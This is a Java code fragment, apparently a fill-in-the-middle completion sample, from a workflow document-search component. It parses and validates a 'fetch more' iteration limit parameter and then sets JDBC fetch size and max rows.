CoreFrameworkServiceLocator.getParameterService().getParameterValueAsString(KewApiConstants.KEW_NAMESPACE, KRADConstants.DetailTypes.DOCUMENT_SEARCH_DETAIL_TYPE, KewApiConstants.DOC_SEARCH_FETCH_MORE_ITERATION_LIMIT); if (!StringUtils.isBlank(fetchMoreLimitValue)) { try { fetchMoreLimit = Integer.parseInt(fetchMoreLimitValue); if (fetchMoreLimit < 0) { LOG.warn(KewApiConstants.DOC_SEARCH_FETCH_MORE_ITERATION_LIMIT + " was less than zero. Please use a value greater than or equal to zero."); fetchMoreLimit = DEFAULT_FETCH_MORE_ITERATION_LIMIT; } } catch (NumberFormatException e) { LOG.warn(KewApiConstants.DOC_SEARCH_FETCH_MORE_ITERATION_LIMIT + " is not a valid number. Value was " + fetchMoreLimitValue); } } return fetchMoreLimit; } }<|fim▁end|>
statement.setFetchSize(maxResultCap + 1); statement.setMaxRows(fetchLimit + 1); PerformanceLogger perfLog = new PerformanceLogger();